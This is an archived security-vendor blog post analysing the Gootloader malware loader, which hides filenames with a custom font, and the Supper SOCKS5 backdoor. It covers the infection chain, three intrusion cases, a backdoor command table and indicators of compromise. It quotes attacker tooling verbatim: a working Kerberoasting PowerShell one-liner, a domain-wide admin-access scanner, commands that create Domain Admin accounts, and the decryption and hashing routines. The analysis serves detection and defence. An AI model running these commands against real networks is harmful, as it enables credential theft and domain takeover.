{ "id": "e599e57b-ed19-4ecf-8bad-00b8637d8dd0", "created_at": "2026-04-06T00:22:16.12903Z", "updated_at": "2026-04-10T03:34:18.745521Z", "deleted_at": null, "sha1_hash": "6d02007f968ea3c1ab3da669fb501bb7645f835a", "title": "Gootloader | Threat Detection Overview | Huntress", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4783250, "plain_text": "Gootloader | Threat Detection Overview | Huntress\r\nArchived: 2026-04-05 19:34:43 UTC\r\nGootloader is a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access. This\r\nmalware is typically delivered when users visit compromised websites, with threat actors leveraging SEO poisoning to drive\r\ntraffic to these sites. The loader uses heavily obfuscated JavaScript payloads to facilitate additional payload delivery and has\r\nbeen active since 2020. After a period of reduced activity, Gootloader operations briefly resurged in March 2025 before\r\ngoing quiet again, only to return recently with renewed activity. Gootloader is known to be used by the threat actor tracked\r\nas Storm-0494 by MSTIC. Storm-0494 then grants access from Gootloader infections to Vanilla Tempest (previously tracked\r\nas DEV-0832). Vanilla Tempest has been active since 2022 and delivers different ransomware families, including Rhysida\r\n(commonly observed in Gootloader post-intrusion activity), BlackCat, Zeppelin, and Quantum Locker.\r\nSince October 27, Huntress has observed three Gootloader infections, including two that led to hands-on-keyboard\r\nintrusions with domain controller compromise occurring within 17 hours of initial infection.\r\nKey takeaways\r\nGootloader is back and now leveraging custom WOFF2 fonts with glyph substitution to obfuscate filenames\r\nExploits WordPress comment endpoints to deliver XOR-encrypted ZIP payloads with unique keys per file\r\nMoved from scheduled tasks to Startup folder persistence mechanism and still using Windows 8.3 short filenames\r\nSupper SOCKS5 Backdoor—Vanilla Tempest's Tool of Choice contains extensive obfuscation: API hammering,\r\nruntime shellcode construction, API hashing, and custom 2-byte LZMA compression\r\nReconnaissance begins within 20 minutes of initial infection, with Domain Controller compromise achieved in as\r\nlittle as 17 hours through predictable attack patterns: AD enumeration (Kerberoasting, SPN scanning), lateral\r\nmovement via WinRM, Domain Admin account creation, and potential ransomware preparation (Volume Shadow\r\nCopy enumeration)\r\nFrom @DFIRReport's observations, lateral movement to the Domain Controller happened within one hour following\r\ninitial JavaScript execution\r\nHow did it happen?\r\nThe user was searching for “missouri cover utility easement roadway” via Bing and visited the first page that showed up in\r\nthe results.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 1 of 23\n\nFigure 1: Compromised site serving Gootloader payload\r\nThe loader abuses WordPress's comment submission endpoint (/wp-comments-post.php) to deliver encrypted payloads.\r\nWhen a user clicks \"Download\" next to one of the five available payloads, the malicious JavaScript sends a POST request to\r\n/wp-comments-post.php with the parameter comment_post_ID={document_id}. The user sees a convincing pop-up\r\ndisplaying a download progress indicator (shown in Figure 2 below), while the site serves an XOR-encrypted ZIP archive.\r\nThe XOR decryption key is hardcoded within the page's source code and corresponds to the filename with extension of the\r\nselected payload (e.g., Missouri_Utility_Easement_Guide_2023.pdf). Each of the five payloads uses a unique XOR key\r\nbased on its respective filename.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 2 of 23\n\nFigure 2: Gootloader infection chain\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 3 of 23\n\nFigure 3: File download pop-up window\r\nThe XOR decryption code:\r\nfunction bc(e,t){\r\nconst n=new TextEncoder().encode(t), // t is the XOR key\r\na=new Uint8Array(e), // e holds the encrypted ZIP archive (ArrayBuffer)\r\nr=new Uint8Array(a.length);\r\nfor(let l=0;l\u003ca.length;l++)\r\nr[l]=a[l]^n[l%n.length]; // XOR each byte with key (repeating)\r\nreturn r.buffer\r\n}\r\nOne of the interesting observations is that Gootloader is using a custom web font to obfuscate the filenames. So, when the\r\nuser attempts to copy the filename or inspect the source code—they will see weird characters like ‛›μI€vSO₽*'Oaμ==€\r\n‚‚33O%33‚€×:O[TM€v3cwv,. However, when rendered in the victim's browser, these same characters magically transform\r\ninto perfectly readable text like Florida_HOA_Committee_Meeting_Guide.pdf. This is achieved through a custom WOFF2\r\nfont file that Gootloader embeds directly into the JavaScript code of the page using Z85 encoding, a Base85 variant that\r\ncompresses the 32KB font into a 40K.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 4 of 23\n\nRather than using OpenType substitution features or character mapping tables, the loader swaps what each glyph actually\r\ndisplays. The font's metadata appears completely legitimate—the character “O” maps to a glyph named \"O\", the character\r\n“a” maps to a glyph named \"a\", and so forth. However, the actual vector paths that define these glyphs have been swapped.\r\nWhen the browser requests the shape for glyph \"O\", the font provides the vector coordinates that draw the letter \"F\" instead.\r\nSimilarly, \"a\" draws \"l\", \"9\" draws \"o\", and special Unicode characters like \"±\" draw \"i\". The gibberish string Oa9Z±h• in\r\nthe source code renders as \"Florida\" on screen.\r\nThis technique defeats static analysis methods. String searches for keywords like \"invoice\" or \"contract\" return nothing\r\nbecause those words don't exist in the source code.\r\nFigure 4: Readable filename display vs. actual source code characters\r\nThis JavaScript file masquerades as jQuery v3.0.0 while embedding heavily obfuscated malicious code in lots of noisy\r\nstring fragments; small helper functions slice and reassemble those fragments using index math and backward loops, then\r\nrun predictable, reversible string transforms (unescape/replace, reorder/reverse fragments, small char-map or byte-shift\r\nfixes, and index math) to rebuild a second-stage JavaScript blob.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 5 of 23\n\nFigure 5: Snippet of the JavaScript file containing the snippet of the malicious code \r\nWhile the script provided by Mandiant did not successfully extract the domains, through deobfuscation of the multi-layered\r\npayload, we were able to produce a readable second-stage PowerShell script and extract all ten C2 domains (Figure 5). An\r\ninitial VBScript wrapper within the script performs execution environment detection by checking whether it's running under\r\nwscript.exe or cscript.exe via the WScript.FullName property. When executed under wscript.exe (the default for double-clicked VBScript files), the wrapper creates a WScript.Shell object and uses the Exec() method to launch PowerShell with\r\nthe command \"powershell \u0026 powershell\" (Back in 2022, Gootloader launched PowerShell with command “pOWErsHELl”).\r\nWhile the ampersand operator (\u0026) chains two commands, only the first PowerShell instance actually receives and executes\r\nthe commands described below.\r\nThe script exfiltrates all environment variables whose values are 99 characters or fewer, captured via (Get-ChildItem\r\nenv:*).Where({$_.value -match \"^.{0,99}$\"}). This 99-character limit appears designed to avoid extremely long PATH\r\nvariables while still capturing sensitive data like USERNAME, COMPUTERNAME, and APPDATA. The operating system\r\ncaption is then appended using Get-CimInstance Win32_OperatingSystem.\r\nBeyond environment variables, the script enumerates all running processes and specifically looks for processes with visible\r\nGUI windows. To extract window titles, it converts each process object to CSV format using ConvertTo-Csv, then parses the\r\n26th field, which corresponds to the MainWindowTitle property in PowerShell's Process object serialization. This reveals\r\nwhat the user is actively working on—open documents, websites, applications, potentially exposing sensitive document\r\nnames or credentials visible in window titles. The script also uses the Shell.Application COM object to enumerate desktop\r\nfiles, classifying each as a link, folder, or file, and inventories all mounted drives with more than 50KB free space to identify\r\nviable storage locations for staging additional payloads.\r\nThe collected data undergoes multi-stage encoding where each reconnaissance output is independently compressed using\r\nGZipStream, then wrapped with custom binary markers, a 6-byte header [235,154,216,67,95,5] and 6-byte footer\r\n[5,135,37,102,109,114], before Base64 encoding. These markers help the C2 server identify and validate the data format.\r\nEach beacon randomly selects one domain from 10 using Get-Random. The beaconing mechanism leverages an infinite loop\r\nwith a 20-second beacon interval via System.Threading.AutoResetEvent, where the loop condition ensures execution never\r\nterminates. Upon successful C2 communication, the script executes received PowerShell commands.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 6 of 23\n\nFigure 6: Cleaned-up second-stage JS script\r\nAfter executing the initial JavaScript file, approximately 10-20 minutes later, two persistence mechanisms would be created\r\nleveraging Startup folder (T1547.001). Gootloader previously used scheduled tasks for persistence. \r\nIn one of our cases observed, the shortcut files were named molecular ecology.lnk and outreach services.lnk. The shortcut\r\nfiles would launch two additional shortcut files dropped under the %AppData% folder. In our case, it's\r\nC:\\Users\\username\\AppData\\Roaming\\ISIS Drivers\\Outreach Services.lnk and\r\nC:\\Users\\username\\AppData\\Roaming\\PFU\\Molecular Ecology.lnk. The latter shortcut files would be responsible for\r\nlaunching JavaScript files under the same folder, where the shortcuts reside (%AppData%\u003cfolder_name\u003e)— EMC\r\nControlCenter.js and Adaptive Algorithms.js. The shortcut files reference their targets using Windows 8.3 short filenames\r\n(e.g., MOLECU1.LNK instead of Molecular Ecology.lnk, EMCCON1.JS instead of EMC ControlCenter.js). Windows\r\nautomatically generates these short filename aliases for compatibility with legacy systems, when a file with a long name is\r\ncreated, Windows creates an 8-character alias using the first six characters plus ~1 and a three-character extension. Similar\r\nshort filename references were also observed in previous Gootloader infections since 2022. The two additional JavaScript\r\nfiles are similar in capabilities as the initial one but they contain different domains (please see “Indicators of Compromise”\r\nsection). It's worth noting that the shortcut files have hotkey combinations (in cases we observed, it’s \"CTRL+ALT+M\" and\r\n“CONTROL+ALT+G”) assigned to them, which allow the loader to execute upon the user pressing these specific key\r\ncombinations.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 7 of 23\n\nFigure 7: Overview of the shortcut file using LECmd tool\r\nBefore diving into the hands-on keyboard activity we observed, let's look at one of the favorite tools in Vanilla Tempest's\r\narsenal, Supper backdoor.\r\nSupper backdoor: Vanilla Tempest's favorite dish\r\nA look into the obfuscation\r\nSupper SOCKS5 backdoor is commonly used by Vanilla Tempest. The backdoor has remote control capabilities over\r\ncompromised hosts and facilitates the tunneling of network traffic. This version of Supper is particularly interesting,\r\nspecifically the obfuscation part. \r\nThe backdoor is leveraging API hammering by making numerous rapid API calls, likely to frustrate analysts and complicate\r\nmanual analysis. This technique floods disassemblers and debuggers with repetitive, benign API calls that must be stepped\r\nthrough or skipped over, making the analysis process tedious and time-consuming. The excessive API activity also obscures\r\nthe control flow and makes it harder to identify which API calls are actually significant to the malware's core functionality\r\nversus which are just noise, forcing analysts to spend more time distinguishing meaningful behavior from deliberate\r\nobfuscation.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 8 of 23\n\nFigure 8: Code with API hammering (on the left), code containing the shellcode with API hammering removed (on the right)\r\nWhat appears to be data assignments in the decompiled pseudocode are actually shellcode instructions being written directly\r\ninto memory at runtime. Each (_QWORD) or (_BYTE) assignment is constructing x86-64 assembly instructions byte-by-byte. For example, the 64-bit value 0x042454890824548B written to memory contains the bytes that form actual instruction,\r\nwhen the processor reads this memory location, it interprets these bytes as “mov rbx, qword ptr [rsp+8]” followed by “mov\r\nrdx, qword ptr [rsp+10]”. Once these instruction bytes are written to memory, the code marks that memory region as\r\nexecutable (using VirtualProtect with PAGE_EXECUTE permissions) and transfers control flow to it, causing the backdoor\r\nto execute the shellcode. The reconstructed shellcode contains the LZMA decompression routine for the final payload.\r\nFigure 9: The reconstructed code containing the LZMA decompression routine\r\nAs mentioned above, the final payload is LZMA-compressed. The implementation uses standard LZMA1 compression with\r\na custom header format. Instead of the standard 13-byte LZMA header (1 byte properties + 4 bytes dictionary size + 8 bytes\r\nuncompressed size), the backdoor uses only a 2-byte custom header. Byte 0 (0x1A) contains position alignment information,\r\nand byte 1 (0x03) contains literal context bits, both parameters configure how the LZMA algorithm decodes the compressed\r\ndata. The dictionary size (8MB, the maximum lookback window LZMA uses to find repeated data sequences during\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 9 of 23\n\ndecompression) and uncompressed size (260,270 bytes) are hardcoded directly into the assembly code rather than being\r\nstored in the header. \r\nThe obfuscated backdoor also leverages API hashing to obfuscate the API calls. The backdoor uses a simple multiplicative\r\nhash algorithm to obfuscate API function names, where each character in the function name string is processed sequentially\r\nby multiplying the running hash by 9 and adding the character's ASCII value. \r\nAPI hashing algorithm:\r\ndef calc_hash(name):\r\nhash_value = 0\r\nfor char in name:\r\nhash_value = (hash_value * 9 + ord(char)) \u0026 0xFFFFFFFF # hash = (hash * 9) + byte\r\nreturn hash_value\r\nThe backdoor uses hash-based DLL resolution by comparing precomputed hash values (such as 0xA20DF064 for\r\nADVAPI32.dll or 0x4465E058 for KERNEL32.dll) to determine which DLL to load. Once a hash match is found, the\r\nfunction reconstructs the corresponding DLL name string in memory and passes it to RtlInitUnicodeString to convert it into\r\na UNICODE_STRING structure, which is the required format for the low-level functions LdrGetDllHandle and LdrLoadDll\r\nthat the backdoor uses instead of LoadLibraryA. The backdoor deliberately uses these native ntdll.dll functions instead of\r\nhigher-level APIs like LoadLibraryA to bypass user-mode hooks commonly placed by security tools, and sandboxes that\r\ntypically monitor the more frequently used kernel32 API calls. The backdoor first attempts to get an existing DLL handle\r\nwith LdrGetDllHandle, falling back to LdrLoadDll if the handle lookup fails.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 10 of 23\n\nFigure 10: Comparing precomputed hashes to the DLL names\r\nThe APIs and DLLs resolved:\r\nADVAPI32.dll\r\nKERNEL32.dll\r\nmsvcrt.dll\r\nNETAPI32.dll\r\nWS2_32.dll\r\nNtdll.dll\r\nLdrGetDllHandle\r\nRtlInitUnicodeString\r\nLdrLoadDll\r\nOpenProcessToken\r\nLoadLibraryA\r\nGetProcAddress\r\nVirtualProtect\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 11 of 23\n\nexit\r\nNetApiBufferFree\r\nrecv\r\nNtProtectVirtualMemory\r\nNtAllocateVirtualMemory\r\nRight before the shellcode execution, invalid memory protection constants (0x16 and 0x06) were passed to\r\nNtProtectVirtualMemory, which causes all three protection change calls to fail with\r\nSTATUS_INVALID_PAGE_PROTECTION since these values don't correspond to any valid Windows PAGE_* constants.\r\nThis error went unnoticed because the shellcode still executes successfully, the allocated memory region already has\r\nPAGE_EXECUTE_READWRITE (0x40) permissions from the initial NtAllocateVirtualMemory call, providing the\r\nnecessary executable permissions for the reconstructed code to run, making the subsequent protection changes unnecessary.\r\nFurther hunting with the Yara rule revealed additional samples using the same obfuscation. These samples are attributed to\r\nOysterLoader (also known as CleanUpLoader or Broomstick), another backdoor that Vanilla Tempest refuses to quit using.\r\nWe named the obfuscator \"TextShell\".\r\nSupper's backdoor menu \r\nThe Supper backdoor communicates with its C2 servers over TCP port 443, the C2 IPs are hardcoded in the binary (please\r\nsee “Indicators of Compromise” section).The backdoor implements a custom stream cipher to encrypt and decrypt traffic.\r\nThe encryption function encrypts outbound data by generating a random key, while the decryption function handles inbound\r\ncommands using a key extracted from the message header. Both use the same XOR algorithm.\r\nWhen the backdoor needs to encrypt data to send to the C2 server, it generates a fresh 4-byte key for every message and\r\nplaces it directly in the message header.\r\nEach message begins with a 12-byte header:\r\nThe encryption key is randomly generated for each message and transmitted in the header. As mentioned above, the\r\nencryption and decryption use the same stateful XOR cipher:\r\nstate = key[0]; // Initialize with first key byte\r\nfor (i = 0; i \u003c length; i++)\r\n{\r\nstate = i + (state * 2); // Evolve based on position\r\ndata[i] ^= state ^ key[i \u0026 3]; // XOR with state and cycling key\r\n}\r\nThe cipher uses an internal counter (called \"state\") that changes as it encrypts each byte. Because the state evolves at each\r\nposition, the same plaintext byte encrypts differently depending on where it appears in the message. When the backdoor\r\nreceives encrypted data from the C2 server, it extracts the key from bytes 8-11 of the header and runs the same algorithm to\r\ndecrypt the data.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 12 of 23\n\nThe mysterious file under %TEMP% folder\r\nThe backdoor receives configuration updates from the C2 server through message type 6 commands (see the command table\r\nbelow). When this message arrives, the backdoor decrypts the payload using the key from the message header. The payload\r\ncontains backup C2 server IP addresses. Rather than storing these IPs in plaintext, the backdoor encrypts them with a newly\r\ngenerated key and writes the encrypted values to a file (we observed the files named s01bafg and orl under %TEMP%\r\nfolder). This persistence mechanism ensures the backdoor maintains an updated list of fallback servers even if the primary\r\nC2 becomes unreachable. \r\nBelow is the command table for the backdoor:\r\nID Purpose Description\r\n0 SOCKS5 Setup\r\nEstablishes SOCKS5 proxy server on infected\r\nhost. Handles authentication negotiation and\r\ncreates threads for proxied connections.\r\n1 SOCKS Disconnect\r\nManages SOCKS connections. Magic value\r\n0x6661696C (\"fail\") disconnects target.\r\nOtherwise forwards data through an active\r\ntunnel.\r\n2 Shell Execution\r\nInteractive cmd.exe shell. First call creates\r\nprocess with stdin/stdout pipes. Subsequent\r\ncalls send commands and return output.\r\n3 Self-Delete\r\nCloses C2 connection, spawns “cmd.exe /C\r\nping 1.1.1.1 -n 1 -w 3000 \u003e Nul \u0026 Del /f /q \"\r\n\u003cpath\u003e\", then immediately exits. The ping\r\ncreates a 3-second delay before deletion\r\nexecutes, giving backdoor time to terminate\r\n4 Unused\r\n5 Terminate\r\nComplete shutdown. Closes all connections,\r\nsleeps 2 seconds, performs cleanup, then exits\r\nbackdoor process.\r\n6 Update Config\r\nReceives backup C2 IP addresses, encrypts\r\nthem, writes to temp/s01bafg file.\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 13 of 23\n\n7 Set C2 Address\r\nUpdates current C2 server IP. Formats as\r\ndotted decimal, stores in global variable.\r\nNow, you are probably wondering why we did a full technical write-up on the Supper backdoor, we think it's crucial to be\r\nable to understand the tool's capabilities and see why it's being leveraged by the threat actors—mainly for its simplicity and\r\nreliability. There's nothing groundbreaking here, it's basic SOCKS proxying and a simple shell. But that's exactly the point.\r\nThreat actors don't need sophisticated zero-days when bread-and-butter tools like this get the job done. Understanding the\r\nmundane gives defenders a reality check: most breaches aren't Hollywood-level sophisticated, they are just well-executed\r\nbasics that fly under the radar if the host is not being properly monitored by an endpoint solution.\r\nWhen Gootloader brings friends\r\nCase #1\r\nApproximately 20 minutes after the initial JavaScript execution, the threat actor performed reconnaissance from one of the\r\nFOUR dropped Supper SOCKS5 backdoors. Why the threat actor decided to drop four instances of a Supper backdoor is\r\nstill a mystery.\r\nThe example of the backdoor execution:\r\nC:\\Users\\username\\AppData\\Local\\Zoxsimio\\Failover Dependency.exe\" ./FAILOV~1.ULB ,DllRegisterServer. \r\nThe following reconnaissance commands were executed from the backdoor:\r\nnet user \u003cusername\u003e /domain\r\nnltest /dclist:\r\nnet group \"domain admins\" /domain\r\nnltest /domain_trusts\r\nSome additional interesting reconnaissance commands were executed:\r\nThis command searches Active Directory (AD) for user accounts with Service Principal Names (SPNs):\r\npowershell.exe -command \"$search = New-Object DirectoryServices.DirectorySearcher([ADSI]''); $search.Filter =\r\n'(\u0026(servicePrincipalName=*)(objectCategory=user))'; $results = $search.FindAll(); foreach ($result in $results) { $u\r\n= $result.GetDirectoryEntry(); Write-Host $u.name, $u.samaccountname; foreach ($s in $u.servicePrincipalName) {\r\nWrite-Host $s; } Write-Host '---'; }\"\r\nThis command scans all domain computers to find where the current user has local admin access:\r\npowershell.exe -ExecutionPolicy bypass -Command \"$UBcPGBjR99=\r\n{param($vars);$nZzkzLTK99=$vars.computer;$Error.clear();Get-WmiObject -Class Win32_OperatingSystem -\r\nComputerName $nZzkzLTK99 -ErrorAction SilentlyContinue;$SBUXiYcH99=$error[0];$out='';if($SBUXiYcH99 -\r\neq $null){$out='Local Admin access on: $nZzkzLTK99';}elseif(-not\r\n$SBUXiYcH99.Exception.Message.Contains(\\\"Access is denied.\\\")){}else{}$out;};$YSUPVCAn99=New-Object\r\nSystem.DirectoryServices.DirectorySearcher;$YSUPVCAn99.SearchRoot=New-Object\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 14 of 23\n\nSystem.DirectoryServices.DirectoryEntry;$YSUPVCAn99.Filter='(\u0026\r\n(sAMAccountType=805306369))';$zcGEXXZD99=$YSUPVCAn99.FindAll()|%{$_.properties.dnshostname};$rsp=\r\n[runspacefactory]::CreateRunspacePool(1,100);$rsp.CleanupInterval=New-TimeSpan -Seconds\r\n10;$rsp.open();$jobs=New-Object System.Collections.ArrayList;$i=0;while($i -lt $zcGEXXZD99.Count)\r\n{$nZzkzLTK99=$zcGEXXZD99[$i];if($rsp.GetAvailableRunspaces() -gt 0){$vars=\r\n[PSCustomObject]@{'computer'=$nZzkzLTK99};$PS3=\r\n[PowerShell]::Create();$PS3.AddScript($UBcPGBjR99).AddArgument($vars)|Out-Null;$PS3.RunspacePool=$rsp;$jobs+=\r\n[PSCustomObject]@{Pipe=$PS3;Status=$PS3.BeginInvoke()};$i++;}else{Sleep -Milliseconds\r\n500;}}while($jobs.Status.IsCompleted -notcontains $true){Sleep -Milliseconds 500;}foreach($job in $jobs){Write-Host $($job.Pipe.EndInvoke($job.Status));$job.Pipe.Dispose();}$rsp.Close();$rsp.Dispose();\"\r\nThis command performs a Kerberoasting attack to extract crackable password hashes:\r\npowershell.exe -ExecutionPolicy bypass -Command \"$Null =\r\n[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel'); $search = New-Object\r\nDirectoryServices.DirectorySearcher([ADSI]''); $search.filter = '(\u0026(servicePrincipalName=*)\r\n(objectCategory=user))'; $results = $search.Findall(); foreach ($results in $results) { $u =\r\n$results.GetDirectoryEntry(); $samAccountName = $u.samAccountName; foreach ($s in $u.servicePrincipalName)\r\n{ $Ticket = $null; try { $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -\r\nArgumentList $s; } catch [System.Management.Automation.MethodInvocationException] {} if ($Ticket -ne $null) {\r\n$TicketByteStream = $Ticket.GetRequest(); if ($TicketByteStream) { $TicketHexStream =\r\n[System.BitConverter]::ToString($TicketByteStream) -replace '-'; [System.Collections.ArrayList]$Parts =\r\n($TicketHexStream -replace '^(.*?)04820...(.*)', '$2') -Split 'A48201'; $Parts.RemoveAt($Parts.Count - 1); $Hash =\r\n$Parts -join 'A48201'; try { $Hash = $Hash.Insert(32, '$'); $HashFormat = '$krb5tgs$23$*' + $samAccountName + '/'\r\n+ $s + '*$' + $Hash; Write-Host $HashFormat; break; } catch\r\n[System.Management.Automation.MethodInvocationException] {} } } } }\"\r\nApproximately 16 hours and 54 minutes after the initial JavaScript execution and reconnaissance activity, the threat actor\r\nmoved laterally via WinRM (Windows Remote Management) to the Domain Controller. On the Domain Controller, the\r\nthreat actor created a user sccmad and added it to the Domain Admins and local Administrators groups, then  enumerated\r\ncurrently logged-on users on the system to verify that the newly created user exists via the following commands:\r\nnet USER sccmad \u003credacted password\u003e /ADD\r\nnet group \\\"Domain Admins\\\" sccmad /ADD /DOMAIN\r\nnet LOCALGROUP administrators sccmad /add\r\nquser.exe\r\nThe threat actor then leveraged Impacket to remotely execute the following command on the Domain Controller:\r\ncmd.exe /Q /c echo C:\\Windows\\system32\\cmd.exe /C vssadmin list shadows /for=C: ^\u003e\r\nC:\\Windows\\Temp\\__output \u003e C:\\Windows\\TEMP\\execute.bat \u0026 C:\\Windows\\system32\\cmd.exe /Q /c\r\nC:\\Windows\\TEMP\\execute.bat \u0026 del C:\\Windows\\TEMP\\execute.bat\r\nImpacket automatically wrapped this command in its standard batch file execution pattern, creating a temporary file named\r\nexecute.bat under C:\\Windows\\TEMP\\ folder, running the vssadmin command to enumerate Volume Shadow Copy\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 15 of 23\n\nsnapshots, redirecting the output, and then deleting the batch file to remove artifacts. This allowed the threat actor to identify\r\nwhat backup snapshots existed on the system, typically as a precursor to deleting them before deploying ransomware.\r\nCase #2\r\nIn another case, we observed the threat actor running the following reconnaissance commands from the dropped Supper\r\nbackdoor approximately 20 minutes after the initial JavaScript execution:\r\nThis command searches AD for all user accounts that have text in their description field, then displays the username\r\nand description. Administrators sometimes store sensitive information in user description fields, such as temporary\r\npasswords, account purposes, or privileged account notes. It's a quick way to find potentially valuable information\r\nthat may have been carelessly documented in AD:\r\npowershell -Command \"$searcher = [adsisearcher]'(\u0026(objectCategory=user)(description=*))';\r\n$searcher.PropertiesToLoad.Add('samaccountname'); $searcher.PropertiesToLoad.Add('description'); $results =\r\n$searcher.FindAll(); foreach ($result in $results) { $result.Properties['samaccountname'][0] + ' - ' +\r\n$result.Properties['description'][0] }\"\r\nThis command enumerates all Windows Server machines in the AD domain, displaying their hostname, DNS name,\r\noperating system version, and last logon timestamp. It helps threat actors identify high-value targets like domain\r\ncontrollers, file servers, or application servers. The count at the end gives them the total number of servers in the\r\nenvironment, which helps assess the scope of the network:\r\npowershell -NoProfile -Command \"Write-Host '===== SERVERS ====='; try { $s=New-Object\r\nDirectoryServices.DirectorySearcher; $s.Filter='(objectCategory=Computer)';\r\n'name','dnshostname','operatingsystem','lastlogontimestamp'|%{$s.PropertiesToLoad.Add($_)}; $s.PageSize=5000;\r\n$c=0; $s.FindAll()|%{ if($_.Properties['operatingsystem'] -match 'Windows Server') { $n=$_.Properties['name'];\r\n$d=$_.Properties['dnshostname']; $o=$_.Properties['operatingsystem']; $l=if($_.Properties['lastlogontimestamp']) {\r\n[datetime]::FromFileTime($_.Properties['lastlogontimestamp'][0]) } else { 'N/A' }; Write-Host \\\"$n, $d, $o, $l\\\";\r\n$c++ } }; Write-Host \\\"nCount of all Windows Servers: $c\\\" } catch { Write-Host \\\"nError:\r\n$($_.Exception.Message)\\\" }\"\r\nCase #3\r\nWe observed the threat actor create the user bpadmin and add it to the Remote Desktop Users group on the beachhead host\r\nusing net group \"Remote Desktop Users\" bpadmin /add. Subsequently, the threat actor leveraged their existing Domain\r\nAdmin privileges to perform a DCSync attack.\r\nThe plot thickens…\r\n@DFIRReport kindly shared with us observations from their environment, where the following activity occurred:\r\nThe ZIP file exhibits conditional behavior based on the extraction method. When opened with a tool like 7-Zip, it\r\ndrops the malicious JavaScript file disguised as a .txt file. However, when extracted using the default Windows ZIP\r\nutility, it directly drops the JavaScript file in executable form.\r\nThe threat actor achieved lateral movement to a domain controller in under one hour following the initial Gootloader\r\ninfection, which is significantly faster than the 17-hour timeframe observed in Case #1. \r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 16 of 23\n\nOnce access to the domain controller was gained, the threat actor deployed a malicious proxy DLL and established\r\npersistence via a scheduled task running with SYSTEM privileges. Analysis of the DLL revealed embedded\r\nshellcode referencing a project named MEOWBACKCONN.\r\nFollowing persistence establishment, the threat actor used ntdsutil to dump the NTDS.dit database (T1003.003), then\r\ncompressed it into a ZIP archive, likely staged for exfiltration.\r\nThe threat actor performed cleanup activities following their operations, including clearing event logs and deleting\r\nregistry keys related to Terminal Server client connections (T1070.001).\r\nConclusion\r\nGootloader has returned with some changes, most notably its use of custom WOFF2 fonts that perform glyph substitution by\r\ntransforming gibberish characters in source code into legitimate-looking filenames when rendered in browsers.\r\nThe infection operates through a well-established criminal partnership: Storm-0494 handles Gootloader operations and\r\ninitial access, then hands off compromised environments to Vanilla Tempest for post-exploitation and ransomware\r\ndeployment. This division of work has proven effective since 2020, with Vanilla Tempest consistently deploying various\r\nransomware families, particularly Rhysida.\r\nThe Supper SOCKS5 backdoor uses tedious obfuscation protecting simple functionality—API hammering, runtime\r\nshellcode construction, and custom encryption add analysis headaches, but the core capabilities remain deliberately basic:\r\nSOCKS proxying and remote shell access. This \"good enough\" approach proves that threat actors don't need cutting-edge\r\nexploits when properly obfuscated bread-and-butter tools achieve their objectives.\r\nWhat did we learn from this?\r\nThreat actors move fast—reconnaissance within 20 minutes, Domain Controller compromise within 17 hours. Organizations\r\nhave an extremely narrow detection and response window before attackers establish Domain Admin access and begin\r\nransomware preparation. Despite sophisticated initial obfuscation, threat actors follow repeatable patterns: AD enumeration\r\n(Kerberoasting, SPN scanning), domain-wide local admin scanning, lateral movement via WinRM, privileged account\r\ncreation, and Volume Shadow Copy enumeration. These behaviors are detectable with proper monitoring. Most breaches\r\nsucceed through well-executed basic techniques, not zero-days. Monitor for unusual PowerShell execution, AD enumeration\r\npatterns, privilege escalation attempts, and lateral movement. These \"mundane\" activities are your earliest warning signs.\r\nWhile Gootloader enhances its evasion capabilities, the attack patterns that follow remain consistent. \r\nThe map of the infection chain (Case #1)\r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 17 of 23\n\nFigure 11: Gootloader infection chain\r\nDetections\r\nYara\r\nSupper backdoor\r\nIndicators of Compromise\r\nItem Description\r\nSHA256:\r\ncf44aa11a17b3dad61cae715f4ea27c0cbf80732a1a7a1c530a5c9d3d183482a\r\nC2s:\r\n103.253.42[.]91\r\nTextShell containing Supper Backdoor: Failover\r\nDependency Zoxsimio.ulb \r\nhttps://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation\r\nPage 18 of 23\n\n91.236.230[.]134\r\n213.232.236[.]138\r\n146.19.49[.]177\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\ISIS Drivers\\\r\nSHA256:\r\n39d980851be1e111c035e4db2589fa3d5f59a5bef7b7b3e36bff5435c78f7049\r\nDomains:\r\nhxxps://cortinaspraga.com/\r\nhxxp://cookcountyjudges.org/\r\nhxxps://x.fybw.org/\r\nhxxps://jungutah.com/\r\nhxxps://influenceimmo.com/\r\nhxxps://tokyocheapo.com/\r\nhxxps://espressonisten.de/\r\nhxxps://tiresdoc.com/\r\nhxxps://hotporntv.net/\r\nhxxps://yourboxspring.nl/\r\nGootloader’s secondary JavaScript file: 